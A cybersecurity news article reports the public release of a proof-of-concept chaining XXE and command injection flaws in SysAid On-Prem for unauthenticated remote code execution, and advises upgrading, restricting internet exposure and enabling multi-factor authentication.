PoC exploit for SysAid pre-auth RCE released, upgrade quickly!

WatchTowr researchers have released a proof-of-concept (PoC) exploit that chains two vulnerabilities in SysAid On-Prem – the self-hosted version of the platform behind SysAid’s popular IT service management and IT helpdesk solutions – to achieve unauthenticated remote code execution on the underlying server.

The vulnerabilities have been patched in SysAid On-Prem v24.4.60, released in early March 2025, but it’s likely that many enterprises have not upgraded yet.

Creating the PoC

“In an on-premise deployment, SysAid runs as a Windows Server–based application within your organization’s infrastructure. Think of the SysAid server as just another Windows box in your closet, except this one handles every IT ticket, asset record, and help-desk magic you throw at it,” WatchTowr researchers explained.

By probing the application for weaknesses, they uncovered three XML external entity injection vulnerabilities (CVE-2025-2775, CVE-2025-2776 and CVE-2025-2777).

Those can be exploited by sending a specially crafted HTTP POST request that will force the application to download data from an attacker-controlled server and process it – and an attacker does not need valid login credentials to take advantage of any of them.

They then showed that by leveraging one of them, they can grab a specific file from the instance, which is created when SysAid is first installed and contains the clear-text password of the main administrator account.

They reported the vulnerabilities to SysAid, and the company patched those and others in the aforementioned v24.4.60 of the platform. Among the others was CVE-2025-2778 (or SYSAID-11246), an OS command injection vulnerability that was either found internally or reported by another researcher.

By comparing the vulnerable and the patched version, they pinpointed the command injection flaw. With that knowledge and the admin credentials in hand, they demonstrated that they could achieve pre-auth remote code execution by sending a HTTP request.

Upgrade and/or prevent access to SysAid instances

If your SysAid instance is internet-facing, you should upgrade it as soon as possible, if not immediately: With a PoC publicly available and SysAid On-Prem having been targeted by ransomware gangs in the past, it’s only a matter of time until exploitation attempts start.

Also consider whether you really need the instance to be reachable via the internet. If not, disable public internet access, put SysAid behind a firewall or VPN, and only allow access from trusted IPs or internal networks.

Securing SysAid admin and standard user accounts with multi-factor authentication is also a good idea.

Subscribe to our breaking news e-mail alert to never miss out on the latest breaches, vulnerabilities and cybersecurity threats. Subscribe here!